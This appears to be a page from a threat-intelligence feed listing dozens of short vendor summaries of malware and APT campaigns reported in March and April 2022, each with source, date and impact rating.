- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyberreason discovered a new APT-C-23 campaign targeting a group of high-profile Israeli targets working for sensitive defense law enforcement and emergency services organizations. The investigation revealed that APT-C-23 has effectively upgraded its malware arsenal with new tools dubbed Barb(ie) Downloader and BarbWire Backdoor.
UAC-0010 group/Armageddon targeting Ukraine government
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0010 group/Armageddon targeting Ukraine government
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
UAC-0010 group/Armageddon targeting European Union institutions
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0010 group/Armageddon targeting European Union institutions
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
Chinese APT targets Indian Powegrid
MEDIUM
+
—
- Intel Source:
- Recorded Future
- Intel Name:
- Chinese APT targets Indian Powegrid
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Recorded Future finds continued targeting of the Indian power grid by Chinese state-sponsored activity group - likely intended to enable information gathering surrounding critical infrastructure systems.
Windows MetaStealer Malware
MEDIUM
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Windows MetaStealer Malware
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers at SANS has analysed 16 sampled of Excel files submitted to VirusTotal on 30-03-2022 these Excel files are distributed as Email attachments. Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity.
Malicious Word Documents Using MS Media Player
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious Word Documents Using MS Media Player
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- ASEC Researchers has analysed a malicious word file that is also being distributed with text that impersonates AhnLab. The Word files downloaded another Word file containing malicious VBA macro via the external URL and run it. The downloaded word file used the Windows Media Player() function instead of AutoOpen() to automatically run the VBA macro.
BLISTER & SocGholish loaders delivering LockBit Ransomware
MEDIUM
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- BLISTER & SocGholish loaders delivering LockBit Ransomware
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro made a recent discovery in which BLISTER and SocGholish which are loaders and are known for evasion tactics were involved in a campaign which were used to deliver LockBit ransomware.
Cicada/APT10 new espionage campaign
MEDIUM
+
—
- Intel Source:
- Symantec
- Intel Name:
- Cicada/APT10 new espionage campaign
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers at Symantec has discovered an espionage campaign by Chinese APT group called APT10/Cicada. Victims identified in this campaign include government legal religious and non-governmental organizations (NGOs) in multiple countries around the world including in Europe Asia and North America.
Evolution of FIN7 group
MEDIUM
+
—
- Intel Source:
- Mandiant
- Intel Name:
- Evolution of FIN7 group
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Mandiant published their research on the evolution of FIN7 from both historical and recent intrusions and describes the process of merging eight previously suspected UNC groups into FIN7. The researchers also highlighted notable shifts in FIN7 activity over time including their use of novel malware incorporation of new initial access vectors and shifts in monetization strategies.
Scammers are Exploiting Ukraine Donations
LOW
+
—
- Intel Source:
- McAfee
- Intel Name:
- Scammers are Exploiting Ukraine Donations
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- McAfee Researchers has identified some malicious sites and emails used by attackers to lure netizens on cryptocurrency donation scam.
New AsyncRAT campaign features 3LOSH crypter
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- New AsyncRAT campaign features 3LOSH crypter
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Cisco Talos Intelligence Group discovered ongoing malware distribution campaigns are using ISO disk images to deliver AsyncRAT and other commodity malware to victims. They found that these campaigns appear to be linked to a new version of the 3LOSH crypter.
CaddyWiper Malware- New Analysis
MEDIUM
+
—
- Intel Source:
- Morphisec
- Intel Name:
- CaddyWiper Malware- New Analysis
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Morphisec shares a new analysis on Caddywiper malware which has surfaced as the fourth destructive wiper attacking Ukrainian infrastructure. Caddywiper destroys user data partitions information from attached drives and has been spotted on several dozen systems in a limited number of organizations.
Colibri Loader campaign delivering the Vidar Stealer
LOW
+
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Colibri Loader campaign delivering the Vidar Stealer
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- Researchers from MalwareBytes recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload that uses a clever persistence technique that combines Task Scheduler and PowerShell.
New Rat campaign leverages Tax Season
LOW
+
—
- Intel Source:
- Cofense
- Intel Name:
- New Rat campaign leverages Tax Season
- Date of Scan:
- 2022-04-06
- Impact:
- LOW
- Summary:
- Cofense Phishing Defense Center team has discovered a tatic that spoofs the U.S. Internal Revenue Service (IRS) to download malware onto user systems. This campaign leverages Netsupport Manager a troubleshooting and screen control program as a malicious remote access trojan (RAT) the threat actor employs to remotely enter user systems.
Lazarus Group New Campaign
LOW
+
—
- Intel Source:
- SecureList
- Intel Name:
- Lazarus Group New Campaign
- Date of Scan:
- 2022-04-06
- Impact:
- LOW
- Summary:
- Researchers at SecureList has discovered a Trojanized DeFi application was used to deliver backdoor by Lazarus Group. The DeFi application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet but also implants a malicious file when executed.
Mirai campaign updated its arsenal of exploits
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Mirai campaign updated its arsenal of exploits
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet Labs has identified that the Beastmode Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month with three targeting various models of TOTOLINK routers.
New UAC-0056 Group activity
MEDIUM
+
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New UAC-0056 Group activity
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Intezer Labs shared that UAC-0056 (TA471 SaintBear UNC2589) have been launching targeted spear phishing campaigns using spoofed Ukrainian governmental email addresses to deliver the Elephant malware framework written in Go.
Stolen Image Evidence Campaign
MEDIUM
+
—
- Intel Source:
- DFIR Report
- Intel Name:
- Stolen Image Evidence Campaign
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers at DFIR Report has identified a single Conti ransomware deployment from December that appears to be part of a larger campaign. The attack utilized IcedID a well known banking trojan was delivered via the 'Stolen Images Evidence' email campaign.
Remcos Rat Phishing Campaign
MEDIUM
+
—
- Intel Source:
- Morphisec
- Intel Name:
- Remcos Rat Phishing Campaign
- Date of Scan:
- 2022-04-05
- Impact:
- MEDIUM
- Summary:
- Morphisec Labs has detected a new wave of Remcos RAT infections being spread through phishing emails masquerading as payment remittances sent from financial institutions.
VajraEleph (APT-Q-43) group New campaign
LOW
+
—
- Intel Source:
- Qianxin
- Intel Name:
- VajraEleph (APT-Q-43) group New campaign
- Date of Scan:
- 2022-04-05
- Impact:
- LOW
- Summary:
- The mobile security team of Qianxin Technology HK Co. Limited Virus Response Center identified the VajraEleph (APT-Q-43) group has been carrying out targeted military espionage intelligence activities against the Pakistani military.
Hive Ransomware leveraging IPfuscation Technique
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- Hive Ransomware leveraging IPfuscation Technique
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne have discovered a new obfuscation technique used by the Hive ransomware gang which involves IPv4 addresses and a series of conversions that eventually lead to downloading a Cobalt Strike beacon.
New PlugX variant used by Chinese APT group
MEDIUM
+
—
- Intel Source:
- Trellix
- Intel Name:
- New PlugX variant used by Chinese APT group
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers at Trellix has discovered a new variant of PlugX malware named 'Talisman'. The new variant follows usual execution process by abusing a signed and benign binary which loads a modified DLL to execute shellcode. The shellcode is used to decrypt the PlugX malware which then serves as a backdoor with plug-in capabilities.
Mars InfoStealer new operation
MEDIUM
+
—
- Intel Source:
- Morphisec
- Intel Name:
- Mars InfoStealer new operation
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Morphisec Labs team has analysed a campaign where the actor distributed Mars Stealer via cloned websites offering well-known software. Morphisec team has attributed this actor to a Russian national by looking at the screenshots and keyboard details from the extracted system.txt.
BlackGuard - new infostealer malware
MEDIUM
+
—
- Intel Source:
- Zscaler
- Intel Name:
- BlackGuard - new infostealer malware
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- The Zscaler ThreatLabz team came across BlackGuard a sophisticated stealer currently being advertised as malware-as-a-service with a monthly price of $200. Researcher share their analysis of the techniques the Blackguard stealer uses to steal information and evade detection using obfuscation as well as techniques used for anti-debugging.
Acid Rain wiper malware targets Viasat KA-SAT modems
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- Acid Rain wiper malware targets Viasat KA-SAT modems
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Sentinel Labs researchers a new modern wiper AcidRain which have beeb targeting Europe and on Viasat KA-SAT modems. This wiper is an ELF MIPS malware designed to wipe modems and routers.
State sponsored groups leveraging RU-UA conflict
MEDIUM
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- State sponsored groups leveraging RU-UA conflict
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers from CheckPoint provides an overview of several campaigns by different APT groups using the ongoing Russia-Ukraine war to increase the efficiency of their campaigns. They also discuss the victimology of these campaigns; the tactics used and provides technical analysis of the observed malicious payloads and malware specially crafted for this cyber-espionage.
North Korea related files distributed via malicious VB Scripts
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- North Korea related files distributed via malicious VB Scripts
- Date of Scan:
- 2022-04-04
- Impact:
- LOW
- Summary:
- ASEC Researchers has analysed a phishing emails related to North Korea and a compressed file is attached. Referring to writing a resume induce execution of the attached file. A malicious VBS script file exists inside the compressed file.
Deep Panda APT group exploiting Log4shell
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Deep Panda APT group exploiting Log4shell
- Date of Scan:
- 2022-04-01
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs detected an opportunistic campaign by the Chinese nation-state “Deep Panda” APT group exploiting the Log4Shell vulnerability in VMware Horizon servers belonging to the financial academic cosmetics and travel industries.
Spoofed Invoice delivering IcedID Trojan
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Spoofed Invoice delivering IcedID Trojan
- Date of Scan:
- 2022-04-01
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs encountered spearphishing campaign targeting a fuel company in Kyiv Ukraine. The email contains an attached zip file which also contains a invoice file claiming to be from another fuel company. IcedID trojan drop via main.dll in windows registry.
Spring4Shell Vulnerability
HIGH
+
—
- Intel Source:
- Securonix
- Intel Name:
- Spring4Shell Vulnerability
- Date of Scan:
- 2022-04-01
- Impact:
- HIGH
- Summary:
- Securonix Threat Research team has identified a currently unpatched zero-day vulnerability in Spring Core a widely used Java-based platform with cross platform support. Early details claim that the bug would allow full remote code execution (RCE) to affected systems.
Transparent Tribe targets Indian government and military
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Transparent Tribe targets Indian government and military
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers has identified a new campaign by Transparent Tribe targeting Indian government and military bodies. The Threat actor is leveraging CrimsonRAT for infecting the victims.
Verblecon - A New Malware Loader
LOW
+
—
- Intel Source:
- Symantec
- Intel Name:
- Verblecon - A New Malware Loader
- Date of Scan:
- 2022-03-31
- Impact:
- LOW
- Summary:
- Symantec researchers has identifed a malware named Trojan.Verblecon which has being leveraged in attacks that appear to have installing cryptocurrency miners on infected machines as their end goals. However the capabilities of this malware indicate that it could be highly dangerous if leveraged in ransomware or espionage campaigns.
Chromium Based Browser Vulnerability
MEDIUM
+
—
- Intel Source:
- Intel Name:
- Chromium Based Browser Vulnerability
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Google is urging users on Windows macOS and Linux to update Chrome builds to version 99.0.4844.84 following the discovery of a vulnerability that has an exploit in the wild.
Multiple APT groups targeting Eastern Europe
MEDIUM
+
—
- Intel Source:
- Intel Name:
- Multiple APT groups targeting Eastern Europe
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Google TAG researchers has tracked 3 APT groups targeting government military organisations in Ukraine Kazakhstan Mongolia and NATO forces in Eastern Europe. All 3 APT groups conducting phishing campaigns to against the targets.
Emotet New IoC and New Pattern
MEDIUM
+
—
- Intel Source:
- Cisco
- Intel Name:
- Emotet New IoC and New Pattern
- Date of Scan:
- 2022-03-30
- Impact:
- MEDIUM
- Summary:
- Cisco conducted research to find new Emotet IOCs and URL patterns related to this new wave in Emotet activity since it’s re-emergence in November 2021. Cisco researchers summarizes the Emotet (Geodo/Heodo) malware threat it’s lifecycle and typical detectable patterns.
Kimsuky distributing VB Script disguised as PDF Files
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky distributing VB Script disguised as PDF Files
- Date of Scan:
- 2022-03-30
- Impact:
- LOW
- Summary:
- ASEC Researchers has identified an APT attacks by a group called Kimsuky using VB Script disguised as PDF files. Upon running the script file with the VBS extension the malware runs the innocuous PDF file that exists internally to trick the user into thinking that they opened an innocuous document file and uses a malicious DLL file to leak information.
BitRAT malware disguised as office Installer
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- BitRAT malware disguised as office Installer
- Date of Scan:
- 2022-03-30
- Impact:
- LOW
- Summary:
- ASEC REsearchers has analysed a BitRAT malware sample which is being distributed as office installer with different files. The malware is being distributed actively via file-sharing websites such as Korean webhards.
Purple Fox using New variant of FatalRat
MEDIUM
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Purple Fox using New variant of FatalRat
- Date of Scan:
- 2022-03-29
- Impact:
- MEDIUM
- Summary:
- Trend Micro Research were tracking an threat actor named 'Purple Fox' and their activities. Researchers identified Purple Fox’s new arrival vector and the early access loaders we believe are associated with the intrusion set behind this botnet. The operators are updating their arsenal with new malware including a variant of the remote access trojan FatalRAT that they seem to be continuously upgrading.
New Conversation Hijacking Campaign Delivering IcedID
MEDIUM
+
—
- Intel Source:
- Intezer
- Intel Name:
- New Conversation Hijacking Campaign Delivering IcedID
- Date of Scan:
- 2022-03-29
- Impact:
- MEDIUM
- Summary:
- Researcher from Intezer provides a technical analysis of a new campaign which initiates attacks with a phishing email that uses conversation hijacking to deliver the IcedID malware.
Muhstik Gang targets Redis Servers
MEDIUM
+
—
- Intel Source:
- Juniper
- Intel Name:
- Muhstik Gang targets Redis Servers
- Date of Scan:
- 2022-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Juniper Threat Labs has revealed an attack that targets Redis Servers using a recently disclosed vulnerability namely CVE-2022-0543. This vulnerability exists in some Redis Debian packages. The payload used is a variant of Muhstik bot that can be used to launch DDOS attacks.
Conti Ransomware new update
MEDIUM
+
—
- Intel Source:
- Zscaler
- Intel Name:
- Conti Ransomware new update
- Date of Scan:
- 2022-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Zscaler ThreatLabz has been following Conti Ransomware group and identified an updated version of Conti ransomware as part of the global ransomware tracking efforts which includes improved file encryption introduced techniques to better evade security software and streamlined the ransom payment process.
Operation Dragon Castling
LOW
+
—
- Intel Source:
- Avast
- Intel Name:
- Operation Dragon Castling
- Date of Scan:
- 2022-03-25
- Impact:
- LOW
- Summary:
- Researchers from Avast found an APT campaign dubbed Operation Dragon Castling which has been targeting betting companies in Southeast Asian countries.The campaign has similarities with several old malware samples used by an unspecified Chinese-speaking APT group.
JSSLoader RAT delivered through XLL Files
LOW
+
—
- Intel Source:
- Morphisec
- Intel Name:
- JSSLoader RAT delivered through XLL Files
- Date of Scan:
- 2022-03-25
- Impact:
- LOW
- Summary:
- Morphisec labs has discovered a new variant of JSSLoader RAT. JSSLoader is a small very capable .NET remote access trojan (RAT). Its capabilities include data exfiltration persistence auto-updating additional payload delivery and more. Moreover attacker are now using .XLL files to deliver and obfuscated version of JSSLoader.
Tax Season and Refugee war scams delivering Emotet
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Tax Season and Refugee war scams delivering Emotet
- Date of Scan:
- 2022-03-25
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs Research team has anlaysed emails related to tax season and the Ukrainian conflict. The Phishing emails are attributed to an unfamous malware called 'Emotet' are affecting Windows platform and compromised machines are under the control of the threat actor further stole personally identifiable information (PII) credential theft monetary loss etc.
Chinese APT Scarab targets Ukraine
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- Chinese APT Scarab targets Ukraine
- Date of Scan:
- 2022-03-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Sentinel Labs has further analysed the alert #4244 released by Ukrainian CERT on 22nd March 2022 which states about the malicious activity of UAC-0026 threat group. Sentinel team has confirmed UAC-0026 attribution with Chinese APT group called Scarab.
Password stealer disguised as private Fortnite server
LOW
+
—
- Intel Source:
- Avast
- Intel Name:
- Password stealer disguised as private Fortnite server
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Avast have identified a password stealer malware disguised as private Fortnite server where users can meet for a private match and use skins for free. The malware is being heavily propagated on communications platform Discord.
New variants of Arkei Stealer
LOW
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- New variants of Arkei Stealer
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at SANS InfoSec Diary blog has analysed Vidar Oski and Mars stealer variants of Arkei Stealer malware. Researchers also found legitimate DLL files has been used by Vidar Oski and Mars variants which are hosted on the same C2 server.
Operation DreamJob and AppleJeus
MEDIUM
+
—
- Intel Source:
- Intel Name:
- Operation DreamJob and AppleJeus
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers from google discovered two new North Korean backed threat actors exploiting a remote code execution vulnerability in Chrome CVE-2022-0609.hese groups' activity has been publicly tracked as Operation Dream Job and Operation AppleJeus. These campaigns have been targeting U.S based organizations.
Arid Viper using Arid Gopher malware
MEDIUM
+
—
- Intel Source:
- deepinstinct
- Intel Name:
- Arid Viper using Arid Gopher malware
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Deep Instinct's Threat Research team discovered a never before seen Micropsia malware dubbed Arid Gropher and is attributed to Arid Viper.
Conti Ransomware Affiliate Exposed
MEDIUM
+
—
- Intel Source:
- eSentire
- Intel Name:
- Conti Ransomware Affiliate Exposed
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers at eSentire has been tracking the movements of Conti gang for over two years and now publishing new set of indicators which are currently being used by Conti affiliate. Researchers analysis also focus on the infrastructre used by the gang.
Vidar Malware hidden in Microsoft Help file
MEDIUM
+
—
- Intel Source:
- Trustwave
- Intel Name:
- Vidar Malware hidden in Microsoft Help file
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Trustwave Spider Labs researchers has detected a vidar malware based phishing campaign that abuses Microsoft HTML help files. Vidar is Windows spyware and an information stealer available for purchase by cybercriminals. Vidar can harvest OS & user data online service and cryptocurrency account credentials and credit card information.
Crypto Phishing
LOW
+
—
- Intel Source:
- Confiant
- Intel Name:
- Crypto Phishing
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researcher at Confiant has looked at several chains that start with an ad and end with cryptocurrency theft usually via phishing.
Midas Ransomware - A Thanos Ransomware variant
LOW
+
—
- Intel Source:
- Zscaler
- Intel Name:
- Midas Ransomware - A Thanos Ransomware variant
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Zscaler has analysed variants of Thanos ransomware and identified the shifting of tactics by the ransomware in 2021. Thanos ransomware was first identified in Feb 2020 as a RaaS on darkweb. In 2021 Thanos source code got leaked after that lot of variants has been identified by the researchers. One of the latest variant is Midas.
Meris and TrickBot joined Hands
MEDIUM
+
—
- Intel Source:
- Avast
- Intel Name:
- Meris and TrickBot joined Hands
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- As per Avast researchers Meris backdoor and Trickbot have joined hands. The botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers (CVE-2018-14847) enabling the attackers to gain unauthenticated remote administrative access to any affected device.
DoubleZero Destructive Malware targets Ukrainian firms
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- DoubleZero Destructive Malware targets Ukrainian firms
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- On March 17 CERT-UA found presence of a destructive malware dubbed as DoubleZero targeting Ukrainian firms. The malware erases files and destroys certain registry branches on the infected machine.
Phishing Campaign using QR code targets Ukraine
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- Phishing Campaign using QR code targets Ukraine
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- CERT UA discovered the distribution of e-mails that mimic messages from UKR.NET and contain a QR code encoding a URL created using one of the URL-shortener services and it was attributed with low confidence to APT28.
Vermin (UAC-0020) targets Ukraine Govt using Spectr malware
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- Vermin (UAC-0020) targets Ukraine Govt using Spectr malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- On March 17 CERT-UA found an active spear phishing campaign delivering SPECTR malware. The campaign was initiated by Vermin aks UAC-0020 who are associated with Luhansk People’s Republic (LPR).
Mustang Panda deploying new Hodur Malware
MEDIUM
+
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- Mustang Panda deploying new Hodur Malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- A new cyber espionage campaign has been discovered by researchers from ESET in which APT group Mustang Panda who is China linked was deploying Hodur malware. The victims are from east and southeast Asia.
Clipper malware disguised as AvD Crypto Stealer
LOW
+
—
- Intel Source:
- Cyble
- Intel Name:
- Clipper malware disguised as AvD Crypto Stealer
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- Researchers at Cyble has discovered a new malware dubbed as 'AvD crypto stealer' but it is does not function as crypto stealer. However it disguised variant of well-known clipper malware and it has capability of read and edit any text copied by vicitm.
ClipBanker Malware disguised as Malware Creation Tool
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- ClipBanker Malware disguised as Malware Creation Tool
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- ASEC Team has indentified a ClipBanker malware which disguised as malware creation tool. ClipBanker malware monitors the clipbooard of the infected system and if the malware copies a string for a coin wallet address then changes its to the address designated by the attacker.
UAC-0026 targets Ukraine by HeaderTIP malware
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0026 targets Ukraine by HeaderTIP malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- CERT UA identified yet another nefarious malware dubbed headerTip which leveraged to drop additional DLL files to the infected instance and this has been targeting the nfrastructure of Ukrainian state bodies and organizations across the country.
Document-borne APT attack targeting Carbon emissions companies
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- Document-borne APT attack targeting Carbon emissions companies
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- ASEC Team has analysed a malicious word document titled '**** Carbon Credit Institution.doc' which user downloaded thorugh a web browser. The team identified the malicious document from the logs collected by their Smart Defense tool. The malicious document comes with macro code and it is likely that its internal macro code runs wscript.ex.
Serpent Backdoor Targets French government firms
MEDIUM
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- Serpent Backdoor Targets French government firms
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- ProofPoint researchers identified a targeted attack leveraging an open-source package installer Chocolatey to deliver a backdoor. The backdoor was dubbed as Serpent and target has been French firms in cinstruction and real estate.
Malware disguised as a Windows Help File
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- Malware disguised as a Windows Help File
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- ASEC Team has discovered a malware disguised as Windows Help File (*.chm) and targeting Korean users. The CHM File is complied HTML Help file which is executed via Microsoft HTML help executable program. After executing CHM File it downloads additional malicious files.
Serpent Backdoor_Seeder_Queries_21/03/22
MEDIUM
+
—
- Intel Source:
- STR
- Intel Name:
- Serpent Backdoor_Seeder_Queries_21/03/22
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
APT35 Automates Initial Access Using ProxyShell
MEDIUM
+
—
- Intel Source:
- DFIR Report
- Intel Name:
- APT35 Automates Initial Access Using ProxyShell
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- Researchers at DFIR report observed an intrusion attributed to APT35 exploiting ProxyShell vulnerabilities followed by some further post-exploitation activity which included web shells credential dumping and specialized payloads.
SurTr Ransomware recent activity
LOW
+
—
- Intel Source:
- Arete
- Intel Name:
- SurTr Ransomware recent activity
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- Researchers from Arete investigated a security incident involving Surtr ransomware which made registry key change to the infected host to pay tribute to REvil group.
BitRAT distributed via webhards
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- BitRAT distributed via webhards
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- ASEC team has analysed a malware which is being distributed via webhards they identified malware as BitRAT. The attacker disguised the malware as Windows10 license verification tool and to lure the netizens attacker named the installer as 'New Quick Install Windows License Verification' One-click.
DarkHotel APT New Campaign
LOW
+
—
- Intel Source:
- Trellix
- Intel Name:
- DarkHotel APT New Campaign
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- Trelix researchers discovered a first stage malicious campaign targeting luxury hotels in Macao China since last 5 months and the attack has been attributed to South Korean APT group DarkHotel.
UAC-0035/InvisiMole targeting Ukrainain government
LOW
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0035/InvisiMole targeting Ukrainain government
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- CERT-UA identified cyberattacks being launched by the UAC-0035/InvisiMole threat group targeting Ukrainain government organisations using phishing campaigns. InvisiMole is likely a subgroup connected to the Russia-sponsored Gamaredon group.
CONTI & EMOTET Infrastructure
LOW
+
—
- Intel Source:
- Dragos
- Intel Name:
- CONTI & EMOTET Infrastructure
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Researchers at Dragos has observed consistent network communication between the Emotet ransomware group and automotive manufacturers across North America and Japan which is suspected to be controlled by the Conti ransomware.
Cobalt Strike-an effective emulator
LOW
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Cobalt Strike-an effective emulator
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Cobalt Strike is a tool that emulates command and control communications and is widely used in real-world attacks but can also be used as a way to evade traditional firewall defenses. Cobalt Strike users control Beacon’s HTTP indicators through a profile and can select either the default profile or a customizable Malleable C2 profile.
DirtyMoe malware
LOW
+
—
- Intel Source:
- Avast
- Intel Name:
- DirtyMoe malware
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Researchers from Avast warned of the rapid growth of the DirtyMoe botnet which passed from 10 000 infected systems in 2020 to more than 100 000 in the first half of 2021. Experts defined DirtyMoe as a complex malware that has been designed as a modular system. The Windows botnet has been active since late 2017 it was mainly used to mine cryptocurrency but it was also involved in DDoS attacks in 2018.
EXOTIC LILY/BazarLoader_TTP_Seeder_Queries_18/03/22
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- EXOTIC LILY/BazarLoader_TTP_Seeder_Queries_18/03/22
- Date of Scan:
- 2022-03-21
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
CAKETAP Rootkit deployed by UNC2891
MEDIUM
+
—
- Intel Source:
- Mandiant
- Intel Name:
- CAKETAP Rootkit deployed by UNC2891
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Security researchers from Mandiant came across a new Unix rootkit called CakeTap that was used to steal ATM banking data. This rootkit was leveraged by UNC2891.
Conti Gang working with IAB
MEDIUM
+
—
- Intel Source:
- Intel Name:
- Conti Gang working with IAB
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Google TAG team has discovered an operations of a threat actor dubbed 'EXOTIC LILY ' an initial access broker linked to the Conti and Diavol ransomware operations. EXOTIC LILY was first spotted exploiting a zero-day vulnerability in Microsoft MSHTML (CVE-2021-40444). After further investigation it is determined that EXOTIC LILLY is an initial access broker that uses large-scale phishing campaigns to breach targeted corporate networks.
BlackCat and BlackMatter ransomware connection
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- BlackCat and BlackMatter ransomware connection
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
